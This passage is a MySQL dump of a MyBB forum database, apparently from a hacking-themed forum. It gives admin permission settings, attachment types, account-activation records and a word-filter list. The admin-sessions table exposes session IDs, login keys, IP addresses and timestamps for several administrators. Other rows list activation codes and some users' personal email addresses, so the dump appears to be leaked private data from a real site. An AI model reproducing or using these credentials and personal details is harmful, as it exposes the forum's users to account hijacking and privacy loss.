'a:5:{s:6:\"config\";a:16:{s:8:\"settings\";s:1:\"0\";s:7:\"banning\";s:1:\"1\";s:14:\"profile_fields\";s:1:\"1\";s:7:\"smilies\";s:1:\"1\";s:8:\"badwords\";s:1:\"1\";s:6:\"mycode\";s:1:\"1\";s:9:\"languages\";s:1:\"1\";s:10:\"post_icons\";s:1:\"1\";s:14:\"help_documents\";s:1:\"0\";s:7:\"plugins\";s:1:\"0\";s:16:\"attachment_types\";s:1:\"1\";s:7:\"spiders\";s:1:\"0\";s:9:\"calendars\";s:1:\"1\";s:7:\"warning\";s:1:\"1\";s:9:\"mod_tools\";s:1:\"1\";s:15:\"thread_prefixes\";s:1:\"1\";}s:5:\"forum\";a:5:{s:10:\"management\";s:1:\"0\";s:13:\"announcements\";s:1:\"1\";s:16:\"moderation_queue\";s:1:\"1\";s:11:\"attachments\";s:1:\"1\";s:7:\"tabmenu\";s:1:\"0\";}s:4:\"user\";a:8:{s:5:\"users\";s:1:\"1\";s:6:\"groups\";s:1:\"1\";s:6:\"titles\";s:1:\"1\";s:7:\"banning\";s:1:\"1\";s:17:\"admin_permissions\";s:1:\"0\";s:9:\"mass_mail\";s:1:\"0\";s:16:\"group_promotions\";s:1:\"0\";s:16:\"username_history\";s:1:\"1\";}s:5:\"tools\";a:19:{s:13:\"system_health\";s:1:\"0\";s:5:\"cache\";s:1:\"1\";s:5:\"tasks\";s:1:\"0\";s:8:\"backupdb\";s:1:\"1\";s:10:\"optimizedb\";s:1:\"0\";s:15:\"recount_rebuild\";s:1:\"1\";s:8:\"adminlog\";s:1:\"0\";s:6:\"modlog\";s:1:\"1\";s:8:\"maillogs\";s:1:\"0\";s:10:\"mailerrors\";s:1:\"0\";s:10:\"warninglog\";s:1:\"0\";s:8:\"php_info\";s:1:\"0\";s:17:\"file_verification\";s:1:\"1\";s:10:\"statistics\";s:1:\"1\";s:9:\"modreplog\";s:1:\"0\";s:6:\"ip_man\";s:1:\"1\";s:3:\"pms\";s:1:\"0\";s:10:\"sticky_man\";s:1:\"1\";s:13:\"monthly_stats\";s:1:\"1\";}s:11:\"achivements\";a:11:{i:1;i:1;s:5:\"posts\";i:0;s:7:\"threads\";i:0;s:10:\"reputation\";i:0;s:10:\"timeonline\";i:0;s:7:\"regdate\";i:0;s:6:\"custom\";i:0;s:11:\"achivements\";i:0;s:8:\"settings\";i:0;s:10:\"extensions\";i:0;s:6:\"config\";i:0;}}', '', '0', '0'); INSERT INTO mybb_adminoptions VALUES('3', '', '1', '', 'a:5:{s:6:\"config\";a:16:{s:8:\"settings\";s:1:\"0\";s:7:\"banning\";s:1:\"1\";s:14:\"profile_fields\";s:1:\"1\";s:7:\"smilies\";s:1:\"1\";s:8:\"badwords\";s:1:\"1\";s:6:\"mycode\";s:1:\"1\";s:9:\"languages\";s:1:\"1\";s:10:\"post_icons\";s:1:\"1\";s:14:\"help_documents\";s:1:\"0\";s:7:\"plugins\";s:1:\"0\";s:16:\"attachment_types\";s:1:\"1\";s:7:\"spiders\";s:1:\"0\";s:9:\"calendars\";s:1:\"1\";s:7:\"warning\";s:1:\"0\";s:9:\"mod_tools\";s:1:\"1\";s:15:\"thread_prefixes\";s:1:\"1\";}s:5:\"forum\";a:5:{s:10:\"management\";s:1:\"1\";s:13:\"announcements\";s:1:\"1\";s:16:\"moderation_queue\";s:1:\"1\";s:11:\"attachments\";s:1:\"1\";s:7:\"tabmenu\";s:1:\"0\";}s:4:\"user\";a:10:{s:5:\"users\";s:1:\"1\";s:6:\"groups\";s:1:\"1\";s:6:\"titles\";s:1:\"1\";s:7:\"banning\";s:1:\"1\";s:17:\"admin_permissions\";s:1:\"0\";s:9:\"mass_mail\";s:1:\"0\";s:16:\"group_promotions\";s:1:\"1\";s:16:\"username_history\";s:1:\"1\";s:10:\"iplhsearch\";s:1:\"1\";s:6:\"awards\";s:1:\"1\";}s:5:\"tools\";a:19:{s:13:\"system_health\";s:1:\"0\";s:5:\"cache\";s:1:\"1\";s:5:\"tasks\";s:1:\"1\";s:8:\"backupdb\";s:1:\"1\";s:10:\"optimizedb\";s:1:\"0\";s:15:\"recount_rebuild\";s:1:\"1\";s:8:\"adminlog\";s:1:\"0\";s:6:\"modlog\";s:1:\"1\";s:8:\"maillogs\";s:1:\"1\";s:10:\"mailerrors\";s:1:\"1\";s:10:\"warninglog\";s:1:\"1\";s:8:\"php_info\";s:1:\"1\";s:17:\"file_verification\";s:1:\"1\";s:10:\"statistics\";s:1:\"1\";s:9:\"modreplog\";s:1:\"1\";s:6:\"ip_man\";s:1:\"1\";s:3:\"pms\";s:1:\"0\";s:10:\"sticky_man\";i:1;s:13:\"monthly_stats\";i:1;}s:11:\"achivements\";a:11:{i:1;i:1;s:5:\"posts\";i:0;s:7:\"threads\";i:0;s:10:\"reputation\";i:0;s:10:\"timeonline\";i:0;s:7:\"regdate\";i:0;s:6:\"custom\";i:0;s:11:\"achivements\";i:0;s:8:\"settings\";i:0;s:10:\"extensions\";i:0;s:6:\"config\";i:0;}}', '', '0', '0'); DROP TABLE IF EXISTS mybb_adminsessions; CREATE TABLE mybb_adminsessions ( sid varchar(32) NOT NULL, uid int(10) unsigned NOT NULL, loginkey varchar(50) NOT NULL, ip varchar(40) NOT NULL, dateline bigint(30) NOT NULL, lastactive bigint(30) NOT NULL, data text NOT NULL ); INSERT INTO mybb_adminsessions VALUES('4dea451034dd40e8cb266c49b2563268', '3', 'MTgggloPAgqnmZ5JNgs62tdnqMx2QaS8ic5Oo2pwZeLZluHmoI', '75.22.59.132', '1341359104', '1341362283', 'a:1:{s:14:\"last_users_url\";s:33:\"index.php?module=user-users&vid=1\";}'); INSERT INTO mybb_adminsessions VALUES('da263013b5b7a0e99a50631ff16b0dcd', '2', 'fTBop9sPxqN95Fbl7Wg9Wpcf4PeEywi5LAaiheJJkmRXkh4IJd', '173.206.128.176', '1346105164', '1346105182', 'a:2:{s:14:\"last_users_url\";s:33:\"index.php?module=user-users&vid=1\";s:13:\"flash_message\";s:0:\"\";}'); INSERT INTO mybb_adminsessions VALUES('577032859df5f4a9a1736252cbc91e58', '61', 'ed5iZlX7yxl5z75EbTuczHcYHkfgwY2ZGwC5NzmheMygCkIAun', '99.252.235.12', '1352328141', '1352328243', 'a:1:{s:13:\"flash_message\";s:0:\"\";}'); INSERT INTO mybb_adminsessions VALUES('85ac0dd80e6ac06be95081f4bfbd0935', '1', '7COJWdgIFBfzXfMhEgW1IYuDie3p2xoMYifE8nq8UXUmvz7Srd', '72.231.24.165', '1352678891', '1352681433', 'a:1:{s:13:\"flash_message\";s:0:\"\";}'); DROP TABLE IF EXISTS mybb_adminviews; CREATE TABLE mybb_adminviews ( vid int(10) unsigned NOT NULL auto_increment, uid int(10) unsigned NOT NULL, title varchar(100) NOT NULL, type varchar(6) NOT NULL, visibility int(1) NOT NULL, fields text NOT NULL, conditions text NOT NULL, custom_profile_fields text NOT NULL, sortby varchar(20) NOT NULL, sortorder varchar(4) NOT NULL, perpage int(4) NOT NULL, view_type varchar(6) NOT NULL, PRIMARY KEY (vid) ); INSERT INTO mybb_adminviews VALUES('1', '0', 'All Users', 'user', '2', 'a:7:{i:0;s:6:\"avatar\";i:1;s:8:\"username\";i:2;s:5:\"email\";i:3;s:7:\"regdate\";i:4;s:10:\"lastactive\";i:5;s:7:\"postnum\";i:6;s:8:\"controls\";}', 'a:0:{}', 'a:0:{}', 'username', 'asc', '20', 'card'); INSERT INTO mybb_adminviews VALUES('3', '1', 'Spam Finder:Signature', 'user', '1', 'a:7:{i:0;s:8:\"username\";i:1;s:5:\"email\";i:2;s:9:\"usergroup\";i:3;s:7:\"regdate\";i:4;s:10:\"lastactive\";i:5;s:5:\"regip\";i:6;s:8:\"controls\";}', 'a:16:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:7:\"website\";s:0:\"\";s:3:\"icq\";s:0:\"\";s:3:\"aim\";s:0:\"\";s:5:\"yahoo\";s:0:\"\";s:3:\"msn\";s:0:\"\";s:9:\"signature\";s:4:\"www.\";s:15:\"signature_blank\";s:1:\"1\";s:9:\"usertitle\";s:0:\"\";s:11:\"postnum_dir\";s:9:\"less_than\";s:7:\"postnum\";s:2:\"10\";s:7:\"regdate\";s:2:\"20\";s:5:\"regip\";s:0:\"\";s:6:\"lastip\";s:0:\"\";s:6:\"postip\";s:0:\"\";}', 'N;', 'username', 'asc', '20', 'card'); DROP TABLE IF EXISTS mybb_announcements; CREATE TABLE mybb_announcements ( aid int(10) unsigned NOT NULL auto_increment, fid int(10) NOT NULL, uid int(10) unsigned NOT NULL, subject varchar(120) NOT NULL, message text NOT NULL, startdate bigint(30) NOT NULL, enddate bigint(30) NOT NULL, allowhtml int(1) NOT NULL, allowmycode int(1) NOT NULL, allowsmilies int(1) NOT NULL, PRIMARY KEY (aid), KEY fid (fid) ); DROP TABLE IF EXISTS mybb_attachments; CREATE TABLE mybb_attachments ( aid int(10) unsigned NOT NULL auto_increment, pid int(10) NOT NULL, posthash varchar(50) NOT NULL, uid int(10) unsigned NOT NULL, filename varchar(120) NOT NULL, filetype varchar(120) NOT NULL, filesize int(10) NOT NULL, attachname varchar(120) NOT NULL, downloads int(10) unsigned NOT NULL, dateuploaded bigint(30) NOT NULL, visible int(1) NOT NULL, thumbnail varchar(120) NOT NULL, PRIMARY KEY (aid), KEY posthash (posthash), KEY pid (pid,visible), KEY uid (uid) ); INSERT INTO mybb_attachments VALUES('6', '6584', '94880396c0b9044bf17b68680f5897f4', '67', 'Anonymous Hedgehog.png', 'image/png', '277957', '201210/post_67_1351506643_8d449d6f85660540a0135e528539675f.attach', '3', '1351506643', '1', '201210/post_67_1351506643_8d449d6f85660540a0135e528539675f_thumb.png'); INSERT INTO mybb_attachments VALUES('7', '7084', 'f278b6d354bbfb2a83a3a5c1e0f61ba8', '1', 'l33t.png', 'image/png', '12645', '201211/post_1_1352195786_628205bb331e276a506e2eed76ac1f9e.attach', '10', '1352195786', '1', '201211/post_1_1352195786_628205bb331e276a506e2eed76ac1f9e_thumb.png'); DROP TABLE IF EXISTS mybb_attachtypes; CREATE TABLE mybb_attachtypes ( atid int(10) unsigned NOT NULL auto_increment, name varchar(120) NOT NULL, mimetype varchar(120) NOT NULL, extension varchar(10) NOT NULL, maxsize int(15) NOT NULL, icon varchar(100) NOT NULL, PRIMARY KEY (atid) ); INSERT INTO mybb_attachtypes VALUES('1', 'ZIP File', 'application/zip', 'zip', '1024', 'images/attachtypes/zip.gif'); INSERT INTO mybb_attachtypes VALUES('2', 'JPG Image', 'image/jpeg', 'jpg', '500', 'images/attachtypes/image.gif'); INSERT INTO mybb_attachtypes VALUES('3', 'Text Document', 'text/plain', 'txt', '200', 'images/attachtypes/txt.gif'); INSERT INTO mybb_attachtypes VALUES('4', 'GIF Image', 'image/gif', 'gif', '500', 'images/attachtypes/image.gif'); INSERT INTO mybb_attachtypes VALUES('6', 'PHP File', 'application/x-httpd-php', 'php', '500', 'images/attachtypes/php.gif'); INSERT INTO mybb_attachtypes VALUES('7', 'PNG Image', 'image/png', 'png', '500', 'images/attachtypes/image.gif'); INSERT INTO mybb_attachtypes VALUES('8', 'Microsoft Word Document', 'application/msword', 'doc', '1024', 'images/attachtypes/doc.gif'); INSERT INTO mybb_attachtypes VALUES('9', 'HTM File', 'text/html', 'htm', '100', 'images/attachtypes/html.gif'); INSERT INTO mybb_attachtypes VALUES('10', 'HTML File', 'text/html', 'html', '100', 'images/attachtypes/html.gif'); INSERT INTO mybb_attachtypes VALUES('11', 'JPEG Image', 'image/jpeg', 'jpeg', '500', 'images/attachtypes/image.gif'); INSERT INTO mybb_attachtypes VALUES('12', 'GZIP Compressed File', 'application/x-gzip', 'gz', '1024', 'images/attachtypes/tar.gif'); INSERT INTO mybb_attachtypes VALUES('13', 'TAR Compressed File', 'application/x-tar', 'tar', '1024', 'images/attachtypes/tar.gif'); INSERT INTO mybb_attachtypes VALUES('14', 'CSS Stylesheet', 'text/css', 'css', '100', 'images/attachtypes/css.gif'); INSERT INTO mybb_attachtypes VALUES('15', 'Adobe Acrobat PDF', 'application/pdf', 'pdf', '2048', 'images/attachtypes/pdf.gif'); INSERT INTO mybb_attachtypes VALUES('16', 'Bitmap Image', 'image/bmp', 'bmp', '500', 'images/attachtypes/image.gif'); INSERT INTO mybb_attachtypes VALUES('17', 'Microsoft Word 2007 Document', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'docx', '1024', 'images/attachtypes/doc.gif'); INSERT INTO mybb_attachtypes VALUES('18', 'Microsoft Excel Document', 'application/vnd.ms-excel', 'xls', '1024', 'images/attachtypes/xls.gif'); INSERT INTO mybb_attachtypes VALUES('19', 'Microsoft Excel 2007 Document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'xlsx', '1024', 'images/attachtypes/xls.gif'); INSERT INTO mybb_attachtypes VALUES('20', 'Microsoft PowerPoint Document', 'application/vnd.ms-powerpoint', 'ppt', '1024', 'images/attachtypes/ppt.gif'); INSERT INTO mybb_attachtypes VALUES('21', 'Microsoft PowerPoint 2007 Document', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'pptx', '1024', 'images/attachtypes/ppt.gif'); DROP TABLE IF EXISTS mybb_awaitingactivation; CREATE TABLE mybb_awaitingactivation ( aid int(10) unsigned NOT NULL auto_increment, uid int(10) unsigned NOT NULL, dateline bigint(30) NOT NULL, code varchar(100) NOT NULL, type char(1) NOT NULL, oldgroup bigint(30) NOT NULL, misc varchar(255) NOT NULL, PRIMARY KEY (aid) ); INSERT INTO mybb_awaitingactivation VALUES('1', '2', '1339902841', 'nMouQ2oB', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('3', '6', '1341496105', 'nksAq26q', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('7', '10', '1341932547', 'q1mP8aon', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('17', '21', '1343932555', 'WzdUNxVq', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('19', '23', '1343946510', 'DRssoA28', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('20', '24', '1343950326', 'EIEvTGqp', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('23', '27', '1343995649', '1ZsWgtPc', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('24', '27', '1343996905', '55wB7AN1', 'p', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('30', '33', '1344130975', 'XNytPL1k', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('31', '34', '1344133043', 'ButVWDe3', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('39', '42', '1344566640', '6WCmgrDp', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('40', '43', '1344779319', 'KamEMHmo', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('45', '48', '1344941742', 'NCgEeHSs', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('48', '51', '1344956262', 'cxOvHGUJ', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('51', '54', '1344989631', '6W6wNO92', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('52', '55', '1344992773', 'xAFqCHoH', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('53', '56', '1344993267', 'YWPFwIgj', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('54', '57', '1344993351', 'yqBpdItR', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('58', '61', '1345060919', 'RrXpV6PB', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('59', '62', '1345063471', 't9R6pY4Z', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('60', '63', '1345102325', 'm5RPB6Y2', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('64', '67', '1345127387', 'zeL97f93', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('62', '65', '1345109756', 'cbvvI5jr', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('65', '68', '1345134913', 'bVBa3Dy5', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('66', '69', '1345210865', 'tWtA8mlQ', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('67', '70', '1345219533', 'ls5wrsu4', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('77', '80', '1345473467', '36n1tg3o', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('79', '82', '1345502806', 'l4474tLM', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('84', '87', '1345577127', '3dyn5dV8', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('86', '89', '1345578984', 'KI9UqbK9', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('87', '2', '1345591345', 'Q9PBTcvc', 'l', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('88', '90', '1345594226', 'dyXfo84t', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('89', '91', '1345596642', 'FQibVigD', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('95', '97', '1345640081', 'jVH7n3oQ', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('98', '100', '1345677377', 'LHeojWMS', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('99', '101', '1345731070', 'Q6lEWqZy', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('106', '107', '1345810510', 'gWeDrvxu', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('107', '108', '1345810767', 'LRuizqVi', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('108', '109', '1345811031', 'u23Tp3Vk', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('109', '110', '1345811370', 'KfjAzAJY', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('110', '111', '1345811680', 'ktqIzIKV', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('112', '113', '1345831161', 'HrUccPY2', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('115', '116', '1345849083', '4tWXqCKB', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('116', '117', '1345862758', 'iUvzxM6f', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('118', '119', '1345873087', 'VKgKgtrY', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('119', '120', '1345875927', 'LdeaAWcB', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('120', '121', '1345905447', 'yFLDlNtd', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('122', '123', '1345907236', '3qulRgvv', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('123', '124', '1345912406', 'AHLQC4Qt', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('125', '126', '1345917400', 'vZ2urHLN', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('128', '129', '1345970266', 'To8rFSc9', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('129', '130', '1345970370', 'sWt1zQ6Q', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('131', '132', '1346036311', 'D9ftrt5F', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('132', '133', '1346040899', '6VCpv192', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('133', '134', '1346085676', '34q47Yuu', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('134', '135', '1346112256', 'iPHdCSIx', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('135', '136', '1346119444', 'XT7SGCVd', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('136', '137', '1346124687', 'vrQ4m1hB', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('183', '19', '1347173491', 'ZuLXFF75', 'p', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('138', '138', '1346168589', '9j9OejBR', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('139', '139', '1346188577', 'hrXeG4O1', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('140', '140', '1346189259', '7c3LFANX', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('141', '141', '1346191779', 'ncjeZ8Kw', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('142', '142', '1346246339', '3peFJyFi', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('143', '143', '1346250606', 'rYMA6mUp', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('144', '144', '1346253791', 'ph3cIbhp', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('145', '145', '1346260802', 'H6k8Wudj', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('146', '146', '1346262699', 'DKaIQmpX', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('147', '147', '1346266776', 'WSUTUkbR', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('149', '149', '1346318204', 'z4MfEjIw', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('161', '161', '1346434237', 'u3Qp5dmE', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('155', '155', '1346370609', 'XSGNV2Mi', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('156', '156', '1346370834', 'FU4NYMXk', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('157', '157', '1346374246', 'd8IncZz4', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('158', '158', '1346376902', '9zvdOcIO', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('163', '163', '1346508814', 'Pi9uuRAC', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('166', '166', '1346646892', 'n3unYa91', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('168', '168', '1346757136', '4iCKVig7', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('169', '169', '1346759648', 'Ia6lj37j', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('170', '170', '1346762462', '71OmdwDr', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('174', '173', '1346803206', 'VzBR5lju', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('175', '174', '1346835586', 'j7oOHfFQ', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('176', '175', '1346860390', '3xPiGJGN', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('177', '176', '1346863254', 'WwUyo2ff', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('178', '177', '1346873134', 'P5LSRz6k', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('180', '179', '1346983817', 'aEVr8r8N', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('182', '181', '1347135400', 'JMT1JYwH', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('192', '190', '1347751435', 'tHqjQmwa', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('194', '191', '1347758686', 'XOhwb21T', 'e', '2', 'rayboy1995@aol.com'); INSERT INTO mybb_awaitingactivation VALUES('202', '198', '1348535413', 'tWE2u4Py', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('205', '201', '1348804805', 'NR3xQkmp', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('208', '204', '1348891320', 'sa9o5Hby', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('213', '209', '1349019583', 'vqE6IdjI', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('214', '210', '1349049238', 'XOBK2SCF', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('215', '211', '1349056669', 'vhQRgzJW', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('221', '217', '1349386240', 'MGM7ZQTc', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('222', '218', '1349398815', 'vpCJaaFf', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('244', '238', '1349707619', 'dAPjYGPm', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('248', '242', '1349733809', 'Caxoy5CO', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('249', '243', '1349733865', 'dhAGoTxi', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('250', '244', '1349739454', '7D4Ge8gG', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('251', '245', '1349739576', 'iwOQdOcs', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('254', '248', '1349759153', 'TYrfj7iG', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('256', '250', '1349814285', 'GCMcboOd', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('270', '228', '1350221313', 'bPBOxiJg', 'e', '2', 'mymobilebussines@gmail.com'); INSERT INTO mybb_awaitingactivation VALUES('271', '261', '1350224829', '5n72d1jJ', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('273', '263', '1350353250', 'uuphfGAV', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('279', '269', '1350496931', 'oJC3oTte', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('283', '273', '1350527085', 'XsBjVUYs', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('284', '274', '1350533122', '1kQNhrqB', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('285', '275', '1350548413', 'nUNEcbgq', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('286', '276', '1350576634', 'QaCpINWk', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('289', '279', '1350637912', 'szuhW3xt', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('290', '280', '1350641658', 'pM6TD7IA', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('293', '249', '1350685895', 'Ugb7CZxF', 'p', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('295', '283', '1350732720', 'JOQHrZIh', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('298', '286', '1350926848', 'Qla7NWtB', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('299', '287', '1350978794', 'YHuCBDJC', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('304', '292', '1351238750', 'flIb429i', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('305', '293', '1351282538', 'NzKGMTZI', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('308', '296', '1351342217', 'CcYn67JD', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('310', '298', '1351343949', 'Mg4VEddG', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('311', '299', '1351403535', '74pLY9N8', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('312', '300', '1351459447', '7drV2YpK', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('313', '301', '1351460290', 'Ow2HCJ5L', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('315', '303', '1351528448', 'VAUsCt5j', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('319', '307', '1351662517', 'fmhvCguA', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('320', '308', '1351732230', '91R2i1Jv', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('321', '309', '1351779339', 'eD1gVxPP', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('322', '310', '1351789824', 'kexvYWMD', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('324', '314', '1351879481', 'FWEfs8bs', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('327', '317', '1351967367', '3yWKGqRw', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('332', '322', '1352132581', 'IUvv3jKb', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('344', '334', '1352431527', '9MjKXWzP', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('346', '336', '1352468655', 'ccXUOGxO', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('347', '337', '1352490604', 'R3SEHlme', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('349', '339', '1352508374', 'wUfo1Dzw', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('350', '340', '1352544776', 'BK1j7bWL', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('353', '343', '1352608808', 'QQGd9znu', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('354', '344', '1352622844', 'ORmWrqf7', 'r', '0', ''); INSERT INTO mybb_awaitingactivation VALUES('355', '319', '1352624668', 'GGSzfBt2', 'p', '0', ''); DROP TABLE IF EXISTS mybb_badwords; CREATE TABLE mybb_badwords ( bid int(10) unsigned NOT NULL auto_increment, badword varchar(100) NOT NULL, replacement varchar(100) NOT NULL, PRIMARY KEY (bid) ); INSERT INTO mybb_badwords VALUES('1', 'hackforums', '[censored]'); INSERT INTO mybb_badwords VALUES('2', 'sharecash', '[censored]'); INSERT INTO mybb_badwords VALUES('3', 'shitcash', '[censored]'); INSERT INTO mybb_badwords VALUES('7', 'hafeez', 'Jok3r'); INSERT INTO mybb_badwords VALUES('8', 'kamran', 't3h'); INSERT INTO mybb_badwords VALUES('10', 'wrzhost', '[censored]'); INSERT INTO mybb_badwords VALUES('11', 'l33thacking.com', 'l33thacking.net'); INSERT INTO mybb_badwords VALUES('12', 'kamz*', '[Word Forbidden]'); INSERT INTO mybb_badwords VALUES('14', '*lthackin*', '[Forbidden 